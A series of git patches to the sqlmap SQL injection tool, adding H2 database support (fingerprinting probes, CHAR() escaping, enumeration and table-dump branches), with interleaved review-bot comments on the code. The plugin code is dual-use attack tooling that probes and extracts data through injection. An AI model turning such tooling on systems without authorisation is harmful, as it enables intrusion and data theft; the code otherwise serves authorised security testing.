@@ -0,0 +1,122 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.common import Backend +from lib.core.common import Format +from lib.core.common import unArrayizeValue +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import DBMS +from lib.core.session import setDbms +from lib.core.settings import H2_ALIASES +from lib.request import inject +from plugins.generic.fingerprint import Fingerprint as GenericFingerprint + +class Fingerprint(GenericFingerprint): + def __init__(self): + GenericFingerprint.__init__(self, DBMS.H2) + + def getFingerprint(self): + value = "" + wsOsFp = Format.getOs("web server", kb.headersFp) + + if wsOsFp and not conf.api: + value += "%s\n" % wsOsFp + + if kb.data.banner: + dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) + + if dbmsOsFp and not conf.api: + value += "%s\n" % dbmsOsFp + + value += "back-end DBMS: " + actVer = Format.getDbms() + + if not conf.extensiveFp: + value += actVer + return value + + blank = " " * 15 + value += "active fingerprint: %s" % actVer + + if kb.bannerFp: + banVer = kb.bannerFp.get("dbmsVersion") + + if re.search(r"-log$", kb.data.banner): + banVer += ", logging enabled" + + banVer = Format.getDbms([banVer] if banVer else None) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + + htmlErrorFp = Format.getErrorParsedDBMSes() + + if htmlErrorFp: + value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + + return value + + def checkDbms(self): + if not conf.extensiveFp and Backend.isDbmsWithin(H2_ALIASES): + setDbms("%s %s" % (DBMS.H2, Backend.getVersion())) + + if Backend.isVersionGreaterOrEqualThan("1.7.2"): + kb.data.has_information_schema = True + + self.getBanner() + + return True + + infoMsg = "testing %s" % DBMS.H2 + logger.info(infoMsg) + + result = 
inject.checkBooleanExpression("ZERO() IS 0") + + if result: + infoMsg = "confirming %s" % DBMS.H2 + logger.info(infoMsg) + + result = inject.checkBooleanExpression("ROUNDMAGIC(PI())>=3") + + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.H2 + logger.warn(warnMsg) + + return False + else: + kb.data.has_information_schema = True + Backend.setVersion(">= 1.7.2") + setDbms("%s 1.7.2" % DBMS.H2) + + banner = self.getBanner() + if banner: + Backend.setVersion("= %s" % banner) + else: + if inject.checkBooleanExpression("(SELECT [RANDNUM] FROM (VALUES(0)))=[RANDNUM]"): + Backend.setVersionList([">= 2.0.0", "< 2.3.0"]) + else: + banner = unArrayizeValue(inject.getValue("\"org.hsqldbdb.Library.getDatabaseFullProductVersion\"()", safeCharEncode=True)) + if banner: + Backend.setVersion("= %s" % banner) + else: + Backend.setVersionList([">= 1.7.2", "< 1.8.0"]) + + return True + else: + warnMsg = "the back-end DBMS is not %s" % DBMS.H2 + logger.warn(warnMsg) + + dbgMsg = "...or version is < 1.7.2" + logger.debug(dbgMsg) + + return False + + def getHostname(self): + warnMsg = "on H2 it is not possible to enumerate the hostname" + logger.warn(warnMsg) diff --git a/plugins/dbms/h2/syntax.py b/plugins/dbms/h2/syntax.py new file mode 100644 index 00000000000..aab5e6b6c8f --- /dev/null +++ b/plugins/dbms/h2/syntax.py 
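Review bot: checkDbms() keeps HSQLDB-specific logic in what is now the H2 plugin: the version fallback calls `"org.hsqldbdb.Library.getDatabaseFullProductVersion"()` (an HSQLDB Java routine, and misspelled), and the thresholds 1.7.2, 1.8.0, 2.0.0 and 2.3.0, the `isVersionGreaterOrEqualThan("1.7.2")` gate on has_information_schema and the `"...or version is < 1.7.2"` debug message all come from the HSQLDB fingerprint, so an H2 target is reported in HSQLDB version terms. H2 exposes its version through the `H2VERSION()` function, so the banner fallback could become `banner = unArrayizeValue(inject.getValue("H2VERSION()", safeCharEncode=True))` and the HSQLDB version ranges dropped until H2-specific ones are established — confirm against the H2 releases you intend to support. The `ZERO() IS 0` and `ROUNDMAGIC(PI())>=3` probes themselves use H2 function names and look right.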
@@ -0,0 +1,24 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from plugins.generic.syntax import Syntax as GenericSyntax + +class Syntax(GenericSyntax): + def __init__(self): + GenericSyntax.__init__(self) + + @staticmethod + def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") + 'SELECT CHAR(97)||CHAR(98)||CHAR(99)||CHAR(100)||CHAR(101)||CHAR(102)||CHAR(103)||CHAR(104) FROM foobar' + """ + + def escaper(value): + return "||".join("CHAR(%d)" % ord(value[i]) for i in xrange(len(value))) + + return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/h2/takeover.py b/plugins/dbms/h2/takeover.py new file mode 100644 index 00000000000..28d922d3f19 --- /dev/null +++ b/plugins/dbms/h2/takeover.py @@ -0,0 +1,31 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.takeover import Takeover as GenericTakeover + +class Takeover(GenericTakeover): + def __init__(self): + GenericTakeover.__init__(self) + + def osCmd(self): + errMsg = "on H2 it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osShell(self): + errMsg = "on H2 it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osPwn(self): + errMsg = "on H2 it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osSmb(self): + errMsg = "on H2 it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py index a8edb98b829..3f0354974b2 100644 --- a/plugins/generic/databases.py 
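Review bot: The escaper in Syntax.escape iterates by index, `ord(value[i]) for i in xrange(len(value))`, where Python iterates a string directly; `return "||".join("CHAR(%d)" % ord(c) for c in value)` says the same thing more plainly and keeps the doctest output unchanged. The doctest covers only ASCII input; a non-ASCII example would document whether ord() of a unicode code point is the intended CHAR() argument for H2 — confirm.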
+++ b/plugins/generic/databases.py @@ -569,7 +569,7 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod condQueryStr = "%%s%s" % colCondParam condQuery = " AND (%s)" % " OR ".join(condQueryStr % (condition, unsafeSQLIdentificatorNaming(col)) for col in sorted(colList)) - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2): query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) query += condQuery elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): @@ -697,7 +697,7 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod condQueryStr = "%%s%s" % colCondParam condQuery = " AND (%s)" % " OR ".join(condQueryStr % (condition, unsafeSQLIdentificatorNaming(col)) for col in sorted(colList)) - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2): query = rootQuery.blind.count % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) query += condQuery @@ -757,7 +757,7 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod continue for index in getLimitRange(count): - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2): query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) query += condQuery field = None 
@@ -800,7 +800,7 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod singleTimeWarnMessage(warnMsg) if not onlyColNames: - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2): query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl), column, unsafeSQLIdentificatorNaming(conf.db)) elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl.upper()), column, unsafeSQLIdentificatorNaming(conf.db.upper())) diff --git a/plugins/generic/entries.py b/plugins/generic/entries.py index 80230ce0f9c..595e8f9a56f 100644 --- a/plugins/generic/entries.py +++ b/plugins/generic/entries.py @@ -67,7 +67,7 @@ def dumpTable(self, foundData=None): conf.db = self.getCurrentDb() elif conf.db is not None: - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB): + if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB, DBMS.H2): conf.db = conf.db.upper() if ',' in conf.db: @@ -83,7 +83,7 @@ def dumpTable(self, foundData=None): conf.db = safeSQLIdentificatorNaming(conf.db) if conf.tbl: - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB): + if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB, DBMS.H2): conf.tbl = conf.tbl.upper() tblList = conf.tbl.split(',') @@ -226,7 +226,7 @@ def dumpTable(self, foundData=None): entries = zip(*[entries[colName] for colName in colList]) else: query = rootQuery.inband.query % (colString, conf.db, tbl) - elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): + elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2): query = rootQuery.inband.query % (colString, conf.db, tbl, prioritySortColumns(colList)[0]) else: query = rootQuery.inband.query % (colString, conf.db, tbl) 
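Review bot: The `@@ -800` hunk in plugins/generic/databases.py widens the `rootQuery.blind.query2` branch to DBMS.HSQLDB as well as DBMS.H2, whereas the other hunks in this file only append DBMS.H2 to tuples that already contained DBMS.HSQLDB; this changes the query used for HSQLDB targets when `not onlyColNames`, which the commit message ("Initial implementation for #3283") does not mention. If the HSQLDB change is intentional it deserves a line in the commit message or a comment at the branch, e.g. `# Note: HSQLDB shares the MySQL/PgSQL-style blind query2 with H2`; otherwise only DBMS.H2 should be added there. getColumns and dumpTable both extend outside their hunks.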
@@ -399,7 +399,7 @@ def dumpTable(self, foundData=None): if column not in entries: entries[column] = BigArray() - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2): query = rootQuery.blind.query % (agent.preprocessField(tbl, column), conf.db, conf.tbl, sorted(colList, key=len)[0], index) elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): query = rootQuery.blind.query % (agent.preprocessField(tbl, column), tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())), index) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 53ef4b474e0..4f2c6d2ae8f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -23,21 +23,21 @@ b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 1e5532ede194ac9c083891c2f02bca93 extra/wafdetectify/__init__.py c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py -51bd96b450cbfdbff8eea4801e7486ae lib/controller/checks.py +84316968d7235f53aac7e25069128725 lib/controller/checks.py d6deacb76e1f479b3c690c215fad1c08 lib/controller/controller.py -c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py +97a0f363bfc33a5ee4853cdf91515423 lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py -6f9bc9a98821572b68819b8f12de6b59 lib/core/agent.py +a866dd953fdc4b5273a9c28f6b2361f1 lib/core/agent.py c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py -11448f59efbfdceff2437239e36d9dc5 lib/core/common.py +ce7fb7270b104f05d1e2be088b69c976 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py 4086fb55f42e27de5330505605baad0f lib/core/decorators.py fbb55cc6100318ff922957b6577dc58f lib/core/defaults.py -4d50e0f893477196d83608175d1a7de4 lib/core/dicts.py +56b79ee7acd2da19c1678250edfdafab lib/core/dicts.py d4b3d448bcfd9f15d089fc81d38f4825 lib/core/dump.py -705fcf5b66cb4518a54e4d717c915968 lib/core/enums.py +ee7da34f4947739778a07d6c9c05ab54 lib/core/enums.py cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 
@@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -deced6d285dcd850e4e7d8e478527729 lib/core/settings.py +1eb1c8d9bf5f38efc0625524d7dfa8ed lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 47ad325975ab21fc9f11d90b46d0d143 lib/core/target.py @@ -140,6 +140,13 @@ bf98dbd666c162088f23ee697c065010 plugins/dbms/firebird/fingerprint.py d4ea3036492b8ae15340548b2936021f plugins/dbms/firebird/__init__.py c56f2dabe88fd761a1a9a51e4d104088 plugins/dbms/firebird/syntax.py 1522a29bd4b54ea78bb2855fc32b6c72 plugins/dbms/firebird/takeover.py +271a7f16e781d56a0a31a3d5515a1945 plugins/dbms/h2/connector.py +687005cf105ab50c62b6686866d6ef13 plugins/dbms/h2/enumeration.py +b1ed542fff0aa53c54e8bc07658aeaf1 plugins/dbms/h2/filesystem.py +443bc9ac09ce180360ff5a660ac3d6ba plugins/dbms/h2/fingerprint.py +1de698e4cfddd754ffe31ea2640a481a plugins/dbms/h2/__init__.py +4673ebfdce9859718c19e8a7765da8d3 plugins/dbms/h2/syntax.py +af746ef421cfefedc1aaa9dca1503de2 plugins/dbms/h2/takeover.py 271a7f16e781d56a0a31a3d5515a1945 plugins/dbms/hsqldb/connector.py 95919592e5bb83df00b99bb9e8a70977 plugins/dbms/hsqldb/enumeration.py 616595e74ecb644271cbbd31815d92e0 plugins/dbms/hsqldb/filesystem.py 
@@ -206,8 +213,8 @@ a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py 79f6c7017db4ded8f74a0117188836ff plugins/dbms/sybase/takeover.py 34d181a7086d6dfc7e72ae5f8a4cfe0f plugins/generic/connector.py ce6a6ff713852b5eca7b78316cc941c4 plugins/generic/custom.py -2e0c1c5ced14222d9fef2dd12447d815 plugins/generic/databases.py -ea3a7f87e3e0cbc3aacbd3af4b6f5ce6 plugins/generic/entries.py +ca122ea307ed367a55b12a67a6079e74 plugins/generic/databases.py +35546acab0eea406c23b84363df4d534 plugins/generic/entries.py d82f2c78c1d4d7c6487e94fd3a68a908 plugins/generic/enumeration.py 0a67b8b46f69df7cfacc286b47a0d9a5 plugins/generic/filesystem.py f5d5419efddfe04648ea5e953c650793 plugins/generic/fingerprint.py @@ -477,4 +484,4 @@ a279656ea3fcb85c727249b02f828383 xml/livetests.xml 82c65823a0af3fccbecf37f1c75f0b29 xml/payloads/stacked_queries.xml 92c41925eba27afeed76bceba6b18be2 xml/payloads/time_blind.xml ac649aff0e7db413e4937e446e398736 xml/payloads/union_query.xml -b148ef9ef70aaada9eb6e58ab1e384e1 xml/queries.xml +39173640d6807991a6b78e9bea973339 xml/queries.xml diff --git a/xml/queries.xml b/xml/queries.xml index 7278fb08523..db9950f4b43 100644 --- a/xml/queries.xml +++ b/xml/queries.xml @@ -720,6 +720,74 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + From 68f5597b4a2eacbd68602d40cbfebd6a7b5d9529 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 16 Oct 2018 13:26:55 +0200 Subject: [PATCH 327/428] Some cleaning up for #3283 --- lib/core/agent.py | 2 +- lib/core/dump.py | 2 +- lib/core/settings.py | 4 +- plugins/dbms/h2/connector.py | 81 ++------------------------------- plugins/dbms/h2/enumeration.py | 10 ++++ plugins/dbms/h2/fingerprint.py | 41 ++++------------- plugins/dbms/maxdb/connector.py | 2 +- plugins/generic/databases.py | 4 +- txt/checksum.md5 | 18 ++++---- xml/queries.xml | 17 +++---- 10 files changed, 45 insertions(+), 136 deletions(-) 
diff --git a/lib/core/agent.py b/lib/core/agent.py index 10ee4cfdde9..48bf658a1bd 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py @@ -624,7 +624,7 @@ def concatQuery(self, query, unpack=True): elif fieldsNoSelect: concatenatedQuery = "CONCAT('%s',%s,'%s')" % (kb.chars.start, concatenatedQuery, kb.chars.stop) - elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE, DBMS.SQLITE, DBMS.DB2, DBMS.FIREBIRD, DBMS.HSQLDB): + elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE, DBMS.SQLITE, DBMS.DB2, DBMS.FIREBIRD, DBMS.HSQLDB, DBMS.H2): if fieldsExists: concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1) concatenatedQuery += "||'%s'" % kb.chars.stop diff --git a/lib/core/dump.py b/lib/core/dump.py index b5d0b6c6887..444152e8471 100644 --- a/lib/core/dump.py +++ b/lib/core/dump.py @@ -171,7 +171,7 @@ def currentUser(self, data): def currentDb(self, data): if Backend.isDbms(DBMS.MAXDB): self.string("current database (no practical usage on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB) - elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.PGSQL, DBMS.HSQLDB): + elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2): self.string("current schema (equivalent to database on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB) else: self.string("current database", data, content_type=CONTENT_TYPE.CURRENT_DB) diff --git a/lib/core/settings.py b/lib/core/settings.py index e99c4a3269a..130df4ff707 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.21" +VERSION = "1.2.10.22" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -265,7 +265,7 @@ REFERER_ALIASES = ("ref", "referer", "referrer") HOST_ALIASES = ("host",) -HSQLDB_DEFAULT_SCHEMA = "PUBLIC" +H2_DEFAULT_SCHEMA = HSQLDB_DEFAULT_SCHEMA = "PUBLIC" # Names that can't be used to name files on Windows OS WINDOWS_RESERVED_NAMES = ("CON", "PRN", "AUX", "NUL", "COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8", "COM9", "LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9") diff --git a/plugins/dbms/h2/connector.py b/plugins/dbms/h2/connector.py index ee605409f27..e9bc44f9edc 100644 --- a/plugins/dbms/h2/connector.py +++ b/plugins/dbms/h2/connector.py 
@@ -5,87 +5,14 @@ See the file 'LICENSE' for copying permission """ -try: - import jaydebeapi - import jpype -except: - pass - -import logging - -from lib.core.common import checkFile -from lib.core.common import readInput -from lib.core.data import conf -from lib.core.data import logger -from lib.core.exception import SqlmapConnectionException +from lib.core.exception import SqlmapUnsupportedFeatureException from plugins.generic.connector import Connector as GenericConnector class Connector(GenericConnector): - """ - Homepage: https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/ - User guide: https://pypi.python.org/pypi/JayDeBeApi/#usage & http://jpype.sourceforge.net/doc/user-guide/userguide.html - API: - - Debian package: - - License: LGPL & Apache License 2.0 - """ - def __init__(self): GenericConnector.__init__(self) def connect(self): - self.initConnection() - try: - msg = "what's the location of 'hsqldb.jar'? " - jar = readInput(msg) - checkFile(jar) - args = "-Djava.class.path=%s" % jar - jvm_path = jpype.getDefaultJVMPath() - jpype.startJVM(jvm_path, args) - except Exception, msg: - raise SqlmapConnectionException(msg[0]) - - try: - driver = 'org.hsqldb.jdbc.JDBCDriver' - connection_string = 'jdbc:hsqldb:mem:.' 
# 'jdbc:hsqldb:hsql://%s/%s' % (self.hostname, self.db) - self.connector = jaydebeapi.connect(driver, connection_string, str(self.user), str(self.password)) - except Exception, msg: - raise SqlmapConnectionException(msg[0]) - - self.initCursor() - self.printConnected() - - def fetchall(self): - try: - return self.cursor.fetchall() - except Exception, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) - return None - - def execute(self, query): - retVal = False - - try: - self.cursor.execute(query) - retVal = True - except Exception, msg: # TODO: fix with specific error - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) - - self.connector.commit() - - return retVal - - def select(self, query): - retVal = None - - upper_query = query.upper() - - if query and not (upper_query.startswith("SELECT ") or upper_query.startswith("VALUES ")): - query = "VALUES %s" % query - - if query and upper_query.startswith("SELECT ") and " FROM " not in upper_query: - query = "%s FROM (VALUES(0))" % query - - self.cursor.execute(query) - retVal = self.cursor.fetchall() - - return retVal + errMsg = "on H2 it is not (currently) possible to establish a " + errMsg += "direct connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/h2/enumeration.py b/plugins/dbms/h2/enumeration.py index 2035d6f25a9..c4f9560a2ea 100644 --- a/plugins/dbms/h2/enumeration.py +++ b/plugins/dbms/h2/enumeration.py @@ -12,6 +12,7 @@ from lib.core.data import queries from lib.core.common import unArrayizeValue from lib.core.enums import DBMS +from lib.core.settings import H2_DEFAULT_SCHEMA from lib.request import inject class Enumeration(GenericEnumeration): 
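Review bot: The retained `__init__` in the new Connector only calls `GenericConnector.__init__(self)`, which is what Python does without the override, so it can be dropped now that the class holds no state of its own. `connect` unconditionally raises `SqlmapUnsupportedFeatureException`; a one-line docstring such as `"""Direct connections to H2 are not supported; always raises SqlmapUnsupportedFeatureException."""` makes that visible to callers and to anyone scanning the dbms plugins for a working direct mode. The message duplicates the MaxDB connector's text on this same page except for the DBMS name; if more backends follow, a shared template would avoid the two strings diverging again.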
@@ -40,3 +41,12 @@ def getPrivileges(self, *args): def getHostname(self): warnMsg = "on H2 it is not possible to enumerate the hostname" logger.warn(warnMsg) + + def getCurrentDb(self): + return H2_DEFAULT_SCHEMA + + def getPasswordHashes(self): + warnMsg = "on H2 it is not possible to list password hashes" + logger.warn(warnMsg) + + return {} diff --git a/plugins/dbms/h2/fingerprint.py b/plugins/dbms/h2/fingerprint.py index d11313aff81..c2a90521c37 100644 --- a/plugins/dbms/h2/fingerprint.py +++ b/plugins/dbms/h2/fingerprint.py @@ -27,32 +27,28 @@ def getFingerprint(self): value = "" wsOsFp = Format.getOs("web server", kb.headersFp) - if wsOsFp and not conf.api: + if wsOsFp: value += "%s\n" % wsOsFp if kb.data.banner: dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) - if dbmsOsFp and not conf.api: + if dbmsOsFp: value += "%s\n" % dbmsOsFp value += "back-end DBMS: " - actVer = Format.getDbms() if not conf.extensiveFp: - value += actVer + value += DBMS.H2 return value + actVer = Format.getDbms() blank = " " * 15 value += "active fingerprint: %s" % actVer if kb.bannerFp: banVer = kb.bannerFp.get("dbmsVersion") - - if re.search(r"-log$", kb.data.banner): - banVer += ", logging enabled" - - banVer = Format.getDbms([banVer] if banVer else None) + banVer = Format.getDbms([banVer]) value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) htmlErrorFp = Format.getErrorParsedDBMSes() @@ -66,9 +62,6 @@ def checkDbms(self): if not conf.extensiveFp and Backend.isDbmsWithin(H2_ALIASES): setDbms("%s %s" % (DBMS.H2, Backend.getVersion())) - if Backend.isVersionGreaterOrEqualThan("1.7.2"): - kb.data.has_information_schema = True - self.getBanner() return True 
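Review bot: `getCurrentDb` in the enumeration hunk returns the constant `H2_DEFAULT_SCHEMA` instead of asking the backend, so an H2 target whose session schema is not `PUBLIC` is reported wrongly, and the entries.py code on this page assigns that value straight into `conf.db`; if H2 offers no cheap way to read the current schema the shortcut is fair, but it should say so, e.g. `# H2: current schema is not enumerated; the default PUBLIC schema is assumed`. `getPasswordHashes` warns and returns `{}` while the neighbouring `getHostname` only warns and returns None implicitly; making both explicit keeps callers from depending on the difference. The enclosing Enumeration class continues outside the hunk.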
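Review bot: In the getFingerprint hunk `banVer = Format.getDbms([banVer])` drops the old `[banVer] if banVer else None` guard, so when `kb.bannerFp` is set but carries no `dbmsVersion` key the call now receives `[None]` rather than `None`; unless Format.getDbms tolerates a None element (its body is not on this page), restoring the guard as `banVer = Format.getDbms([banVer] if banVer else None)` is the safer form. The same hunk removes the `not conf.api` conditions on the two OS lines, which changes what API consumers see from this plugin; if that is deliberate across plugins it belongs in the commit message. getFingerprint continues outside the hunk.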
@@ -90,31 +83,15 @@ def checkDbms(self): return False else: - kb.data.has_information_schema = True - Backend.setVersion(">= 1.7.2") - setDbms("%s 1.7.2" % DBMS.H2) - - banner = self.getBanner() - if banner: - Backend.setVersion("= %s" % banner) - else: - if inject.checkBooleanExpression("(SELECT [RANDNUM] FROM (VALUES(0)))=[RANDNUM]"): - Backend.setVersionList([">= 2.0.0", "< 2.3.0"]) - else: - banner = unArrayizeValue(inject.getValue("\"org.hsqldbdb.Library.getDatabaseFullProductVersion\"()", safeCharEncode=True)) - if banner: - Backend.setVersion("= %s" % banner) - else: - Backend.setVersionList([">= 1.7.2", "< 1.8.0"]) + setDbms(DBMS.H2) - return True + self.getBanner() + + return True else: warnMsg = "the back-end DBMS is not %s" % DBMS.H2 logger.warn(warnMsg) - dbgMsg = "...or version is < 1.7.2" - logger.debug(dbgMsg) - return False def getHostname(self): diff --git a/plugins/dbms/maxdb/connector.py b/plugins/dbms/maxdb/connector.py index 9b4b8390f85..70295c3c5a0 100644 --- a/plugins/dbms/maxdb/connector.py +++ b/plugins/dbms/maxdb/connector.py @@ -13,6 +13,6 @@ def __init__(self): GenericConnector.__init__(self) def connect(self): - errMsg = "on SAP MaxDB it is not possible to establish a " + errMsg = "on SAP MaxDB it is not (currently) possible to establish a " errMsg += "direct connection" raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py index 3f0354974b2..b63e57979e1 100644 --- a/plugins/generic/databases.py +++ b/plugins/generic/databases.py @@ -438,7 +438,7 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod raise SqlmapNoneDataException(errMsg) elif conf.db is not None: - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB): + if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB, DBMS.H2): conf.db = conf.db.upper() if ',' in conf.db: 
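Review bot: The else-branch of the checkDbms hunk now only calls `setDbms(DBMS.H2)` and `self.getBanner()`, so no version is recorded on this path while the non-extensive path earlier in the function still sets `"%s %s" % (DBMS.H2, Backend.getVersion())`; if `getBanner` is expected to supply the version, a comment such as `# version, when available, is taken from the banner only` would document that. The removed branch was the only visible user of `inject.checkBooleanExpression`, `inject.getValue` and `unArrayizeValue` in fingerprint.py; the import block is outside the hunk, so check those names are not left imported but unused. checkDbms starts outside the hunk.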
@@ -465,7 +465,7 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod colList = filter(None, colList) if conf.tbl: - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB): + if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB, DBMS.H2): conf.tbl = conf.tbl.upper() tblList = conf.tbl.split(',') diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 4f2c6d2ae8f..b4c536e070f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -27,7 +27,7 @@ c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py d6deacb76e1f479b3c690c215fad1c08 lib/controller/controller.py 97a0f363bfc33a5ee4853cdf91515423 lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py -a866dd953fdc4b5273a9c28f6b2361f1 lib/core/agent.py +cb865cf6eff60118bc97a0f106af5e4d lib/core/agent.py c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py ce7fb7270b104f05d1e2be088b69c976 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 